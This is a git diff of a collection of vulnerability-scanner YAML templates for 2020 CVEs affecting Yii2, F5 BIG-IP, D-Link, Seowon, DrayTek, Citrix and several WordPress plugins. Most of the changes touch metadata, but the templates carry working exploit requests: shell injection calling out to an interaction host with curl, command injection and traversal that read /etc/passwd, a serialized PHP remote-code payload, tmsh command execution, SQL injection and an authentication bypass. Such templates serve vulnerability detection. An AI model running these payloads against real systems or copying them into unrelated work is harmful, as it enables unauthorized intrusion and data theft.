reference via permalinks manipulation, as demonstrated by a + wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. + tags: cve,cve2020,wordpress,plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-13700 + cwe-id: CWE-639 requests: - method: GET diff --git a/poc/cve/CVE-2020-14413.yaml b/poc/cve/CVE-2020-14413.yaml index e260ce4ca9..5cbe2e48a3 100644 --- a/poc/cve/CVE-2020-14413.yaml +++ b/poc/cve/CVE-2020-14413.yaml @@ -7,11 +7,6 @@ info: reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8 description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. tags: cve,cve2020,nedi,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-14413 - cwe-id: CWE-79 requests: - method: GET diff --git a/poc/cve/CVE-2020-15148.yaml b/poc/cve/CVE-2020-15148.yaml index a9e3680ead..34b71f6245 100644 --- a/poc/cve/CVE-2020-15148.yaml +++ b/poc/cve/CVE-2020-15148.yaml @@ -1,15 +1,28 @@ id: CVE-2020-15148 info: - name: Yii 2 (yiisoft/yii2) RCE + name: Yii 2 < 2.0.38 - Remote Code Execution author: pikpikcu - severity: high - reference: | - - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 - - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md + severity: critical + description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. + reference: + - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 + - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md + - https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99 + - https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj + remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2020-15148 + cwe-id: CWE-502 + cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* + epss-score: 0.01843 tags: cve,cve2020,rce,yii + metadata: + max-request: 1 -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==" @@ -19,9 +32,11 @@ requests: - type: word words: - "total" - - "internal server error" + - "An internal server error occurred." condition: and - type: status status: - 500 + +# Enhanced by mp on 2022/04/27 diff --git a/poc/cve/CVE-2020-17456.yaml b/poc/cve/CVE-2020-17456.yaml index fba91c11a2..8d4fa7417d 100644 --- a/poc/cve/CVE-2020-17456.yaml +++ b/poc/cve/CVE-2020-17456.yaml @@ -5,18 +5,31 @@ info: author: gy741,edoardottt severity: critical description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/ - https://nvd.nist.gov/vuln/detail/CVE-2020-17456 - http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html + - https://www.exploit-db.com/exploits/50821 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-17456 cwe-id: CWE-78 + epss-score: 0.97074 + epss-percentile: 0.99709 + cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: seowonintech + product: slc-130_firmware tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve +variables: + useragent: '{{rand_base(6)}}' -requests: +http: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 @@ -31,9 +44,10 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 + Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -41,6 +55,11 @@ requests: words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{useragent}}" + - type: word part: header words: @@ -50,4 +69,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/04/27 +# digest: 4a0a0047304502207efe0e5176d8b7d54f1dda7435cf09de296c0603142b0b3cafc19e0ac334d3e2022100e45da5c829c62d576a067a9de1f1d6f5e1eb96aaeb6f56b8604bd7df5765d874:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2020-21224.yaml b/poc/cve/CVE-2020-21224.yaml index 4b25b87e1f..1e84564e2d 100644 --- a/poc/cve/CVE-2020-21224.yaml +++ b/poc/cve/CVE-2020-21224.yaml @@ -7,11 +7,6 @@ info: description: A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul tags: cve,cve2020,clusterengine,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-21224 - cwe-id: CWE-88 requests: - method: POST @@ -22,7 +17,7 @@ requests: Referer: "{{Hostname}}/module/login/login.html" body: | - op=login&username=;`cat /etc/passwd`&password= + op=login&username=;`cat /etc/passwd`&password= matchers-condition: and matchers: diff --git a/poc/cve/CVE-2020-24186.yaml b/poc/cve/CVE-2020-24186.yaml index db823bc245..3889ec4b1a 100644 --- a/poc/cve/CVE-2020-24186.yaml +++ b/poc/cve/CVE-2020-24186.yaml @@ -6,7 +6,12 @@ info: severity: critical description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md - tags: cve,cve2020,wordpress,wp-plugin,rce + tags: cve,cve2020,wordpress,wp-plugin,rce,upload + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-24186 + cwe-id: CWE-434 requests: - raw: @@ -14,25 +19,14 @@ requests: GET /?p=1 HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 745 - Accept: */* X-Requested-With: XMLHttpRequest - sec-ch-ua-mobile: ?0 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak Origin: {{BaseURL}} - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: cors - Sec-Fetch-Dest: empty Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: close ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="action" diff --git a/poc/cve/CVE-2020-24571.yaml b/poc/cve/CVE-2020-24571.yaml index 3e8f391472..7ac3c519d7 100644 --- a/poc/cve/CVE-2020-24571.yaml +++ b/poc/cve/CVE-2020-24571.yaml @@ -6,6 +6,11 @@ info: description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal. reference: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 tags: cve,cve2020,nexusdb,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-24571 + cwe-id: CWE-22 requests: - method: GET diff --git a/poc/cve/CVE-2020-24579.yaml b/poc/cve/CVE-2020-24579.yaml index 59e567cfe4..5f354d7712 100644 --- a/poc/cve/CVE-2020-24579.yaml +++ b/poc/cve/CVE-2020-24579.yaml @@ -1,48 +1,48 @@ id: CVE-2020-24579 info: - name: D-Link DSL 2888a - Authentication Bypass/Remote Command Execution + name: DLINK DSL 2888a RCE author: pikpikcu - severity: high - description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. - reference: - - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ - - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-24579 - classification: - cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-24579 - cwe-id: CWE-287 - epss-score: 0.00215 + severity: medium + description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. + reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ tags: cve,cve2020,dlink,rce - metadata: - max-request: 2 -http: +requests: - raw: - | # Response:Location: /page/login/login_fail.html POST / HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: id,en-US;q=0.7,en;q=0.3 + DNT: 1 + Connection: close Cookie: uid=6gPjT2ipmNz + Upgrade-Insecure-Requests: 1 + Content-Length: 0 username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b - | # Get /etc/passwd GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: id,en-US;q=0.7,en;q=0.3 + DNT: 1 + Connection: close Cookie: uid=6gPjT2ipmNz + Upgrade-Insecure-Requests: 1 + Content-Length: 0 matchers-condition: and matchers: - type: status status: - 200 - - type: regex regex: - "nobody:[x*]:65534:65534" - - "root:.*:0:0:" + - "root:.*:0:0" condition: or - -# Enhanced by mp on 2022/07/13 diff --git a/poc/cve/CVE-2020-25078.yaml b/poc/cve/CVE-2020-25078.yaml index 16195b1423..1789b5371c 100644 --- a/poc/cve/CVE-2020-25078.yaml +++ b/poc/cve/CVE-2020-25078.yaml @@ -1,24 +1,15 @@ id: CVE-2020-25078 info: - name: D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure + name: D-Link DCS-2530L Administrator password disclosure author: pikpikcu severity: high - description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure. - reference: - - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180 - - https://twitter.com/Dogonsecurity/status/1273251236167516161 - - https://nvd.nist.gov/vuln/detail/CVE-2020-25078 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-25078 - epss-score: 0.96698 + description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure. + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078 tags: cve,cve2020,dlink - metadata: - max-request: 1 -http: + +requests: - method: GET path: - "{{BaseURL}}/config/getuser?index=0" @@ -39,5 +30,3 @@ http: - type: status status: - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/poc/cve/CVE-2020-27735.yaml b/poc/cve/CVE-2020-27735.yaml index 31b0f18651..dc84ec8031 100644 --- a/poc/cve/CVE-2020-27735.yaml +++ b/poc/cve/CVE-2020-27735.yaml @@ -8,6 +8,11 @@ info: An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735 tags: cve,cve2020,xss,wing-ftp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-27735 + cwe-id: CWE-79 requests: - method: GET diff --git a/poc/cve/CVE-2020-35489.yaml b/poc/cve/CVE-2020-35489.yaml index 57f9fd7798..38c6fb3ae6 100644 --- a/poc/cve/CVE-2020-35489.yaml +++ b/poc/cve/CVE-2020-35489.yaml @@ -1,22 +1,30 @@ id: CVE-2020-35489 info: - name: contacts form - author: medbsq + name: WordPress Contact Form 7 Plugin - Unrestricted File Upload + author: soyelmago severity: critical + description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters. + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489 + tags: cve,cve2020,wordpress,wp-plugin requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - - type: word - words: - - "Stable tag:" - part: body - type: status status: - 200 + + - type: word + words: + - "Contact Form 7" + part: body + + - type: regex + regex: + - '^([0-4]\.|5\.[0-2]\.|5\.3\.[0-1]$)' + part: body \ No newline at end of file diff --git a/poc/cve/CVE-2020-35736.yaml b/poc/cve/CVE-2020-35736.yaml index 0a2da783b9..ef1f03d2b5 100644 --- a/poc/cve/CVE-2020-35736.yaml +++ b/poc/cve/CVE-2020-35736.yaml @@ -19,7 +19,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" - type: status status: diff --git a/poc/cve/CVE-2020-35951.yaml b/poc/cve/CVE-2020-35951.yaml index dcbf8b8b71..8f6e44259c 100644 --- a/poc/cve/CVE-2020-35951.yaml +++ b/poc/cve/CVE-2020-35951.yaml @@ -68,7 +68,7 @@ requests: - "not found in ([/a-z_]+)wp" req-condition: true - matchers-condition: or + matchers-condition: and matchers: - type: word diff --git a/poc/cve/CVE-2020-36112.yaml b/poc/cve/CVE-2020-36112.yaml index 142c4a081a..2d227f4e18 100644 --- a/poc/cve/CVE-2020-36112.yaml +++ b/poc/cve/CVE-2020-36112.yaml @@ -3,11 +3,9 @@ id: CVE-2020-36112 info: name: CSE Bookstore 1.0 SQL Injection author: geeknik - description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. - reference: | - - https://www.exploit-db.com/exploits/49314 - - https://www.tenable.com/cve/CVE-2020-36112 - severity: critical + description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database. + reference: https://www.exploit-db.com/exploits/49314 + severity: high tags: cve,cve2020,sqli,cse requests: @@ -24,6 +22,34 @@ requests: Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n Upgrade-Insecure-Requests: 1 + - | + POST /ebook/cart.php HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 + Connection: close + Cache-Control: max-age=0 + Referer: http://{{Hostname}}/ebook/book.php?bookisbn=978-1-1180-2669-4 + Content-Type: application/x-www-form-urlencoded + Content-Length: 57 + Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9 + + bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart + + - | + GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 + Connection: close + Cache-Control: max-age=0 + Referer: http://{{Hostname}}/ebook/books.php + Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on + matchers: - type: word part: body diff --git a/poc/cve/CVE-2020-5515.yaml b/poc/cve/CVE-2020-5515.yaml old mode 100755 new mode 100644 diff --git a/poc/cve/CVE-2020-5902.yaml b/poc/cve/CVE-2020-5902.yaml index fe6dc5ec18..c0507f572f 100644 --- a/poc/cve/CVE-2020-5902.yaml +++ b/poc/cve/CVE-2020-5902.yaml @@ -1,62 +1,85 @@ id: CVE-2020-5902 info: - name: F5 BIG-IP TMUI RCE - author: madrobot & dwisiswant0 - severity: high + name: F5 BIG-IP TMUI - Remote Code Execution + author: madrobot,dwisiswant0,ringo + severity: critical + description: F5 BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. + reference: + - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html + - http://packetstormsecurity.com/files/158414/Checker-CVE-2020-5902.html + - http://packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html + - https://badpackets.net/over-3000-f5-big-ip-endpoints-vulnerable-to-cve-2020-5902/ + - https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902 + - https://support.f5.com/csp/article/K52145254 + - https://swarm.ptsecurity.com/rce-in-f5-big-ip/ + - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ + - https://www.kb.cert.org/vuls/id/290915 + - https://nvd.nist.gov/vuln/detail/CVE-2020-5902 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-5902 + cwe-id: CWE-22,CWE-829 + epss-score: 0.97562 + tags: cve2020,bigip,rce,kev,packetstorm,cve + metadata: + max-request: 8 -requests: +http: - method: GET path: - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release" - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license" + - "{{BaseURL}}/hsqldb%0a" + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "BIG-IP release ([\\d.]+)" - "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}" + - "HSQL Database Engine Servlet" condition: or - part: body + - raw: - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=create%20cli%20alias%20private%20list%20command%20bash - | POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=list%20%2Ftmp%2Fnonexistent - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=delete%20cli%20alias%20private%20list + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - "h3ll0_w0Rld" \ No newline at end of file + - "h3ll0_w0Rld" + +# Enhanced by mp on 2022/04/28 diff --git a/poc/cve/CVE-2020-8115.yaml b/poc/cve/CVE-2020-8115.yaml index b404c7d217..34775d22a2 100644 --- a/poc/cve/CVE-2020-8115.yaml +++ b/poc/cve/CVE-2020-8115.yaml @@ -1,4 +1,4 @@ -id: cve-2020-8115 +id: CVE-2020-8115 info: name: Revive Adserver XSS diff --git a/poc/cve/CVE-2020-8191.yaml b/poc/cve/CVE-2020-8191.yaml index 137397c3ee..87c0635817 100644 --- a/poc/cve/CVE-2020-8191.yaml +++ b/poc/cve/CVE-2020-8191.yaml @@ -1,48 +1,33 @@ id: CVE-2020-8191 info: - name: Citrix ADC/Gateway - Cross-Site Scripting + name: Citrix ADC & NetScaler Gateway Reflected XSS + # Leads to RCE author: dwisiswant0 - severity: medium - description: | - Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation. - reference: - - https://support.citrix.com/article/CTX276688 - - https://nvd.nist.gov/vuln/detail/CVE-2020-8191 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-8191 - cwe-id: CWE-79 - epss-score: 0.00223 - tags: cve,cve2020,citrix,xss - metadata: - max-request: 1 + severity: high -http: +requests: - raw: - | POST /menu/stapp HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + DNT: 1 + Connection: close + Upgrade-Insecure-Requests: 1 + Content-Length: 96 Content-Type: application/x-www-form-urlencoded X-NITRO-USER: xpyZxwy6 sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot - matchers-condition: and matchers: - type: word words: - "" part: body - - type: status status: - 200 - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/09/02 diff --git a/poc/cve/CVE-2020-8515.yaml b/poc/cve/CVE-2020-8515.yaml index 05ec699777..21148d4956 100644 --- a/poc/cve/CVE-2020-8515.yaml +++ b/poc/cve/CVE-2020-8515.yaml @@ -5,21 +5,19 @@ info: author: pikpikcu severity: critical description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1. - reference: + reference: | - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ tags: cve,cve2020,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-8515 - cwe-id: CWE-78 requests: - raw: - | POST /cgi-bin/mainfunction.cgi HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a diff --git a/poc/cve/CVE-2020-8644.yaml b/poc/cve/CVE-2020-8644.yaml index 6d66fa8fa8..9f91299c9c 100644 --- a/poc/cve/CVE-2020-8644.yaml +++ b/poc/cve/CVE-2020-8644.yaml @@ -32,7 +32,7 @@ requests: X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password= cookie-reuse: true - host-redirects: true + redirects: true max-redirects: 2 extractors: - type: xpath @@ -55,4 +55,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/07/07 \ No newline at end of file +# Enhanced by mp on 2022/07/07 diff --git a/poc/cve/CVE-2020-8982.yaml b/poc/cve/CVE-2020-8982.yaml index 93cb4b4014..f666b4e92d 100644 --- a/poc/cve/CVE-2020-8982.yaml +++ b/poc/cve/CVE-2020-8982.yaml @@ -1,44 +1,23 @@ id: CVE-2020-8982 info: - name: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read + name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read author: dwisiswant0 severity: high - description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability. - reference: - - https://support.citrix.com/article/CTX269106 - - https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view - - https://www.linkedin.com/posts/jonas-hansen-2a2606b_citrix-sharefile-storage-zones-controller-activity-6663432907455025152-8_w6/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-8982 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-8982 - cwe-id: CWE-22 - cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:* - epss-score: 0.72182 - tags: cve,cve2020,citrix,lfi - metadata: - max-request: 1 -http: +requests: - method: GET path: - "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri" - matchers-condition: and matchers: - + - type: status + status: + - 200 - type: word - part: body words: - "bit app support" - "fonts" - "extensions" condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/27 + part: body \ No newline at end of file diff --git a/poc/cve/CVE-2021-20150.yaml b/poc/cve/CVE-2021-20150.yaml index 07d01288a7..deb050990a 100644 --- a/poc/cve/CVE-2021-20150.yaml +++ b/poc/cve/CVE-2021-20150.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. + remediation: | + Update the router firmware to the latest version to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 @@ -12,12 +14,18 @@ 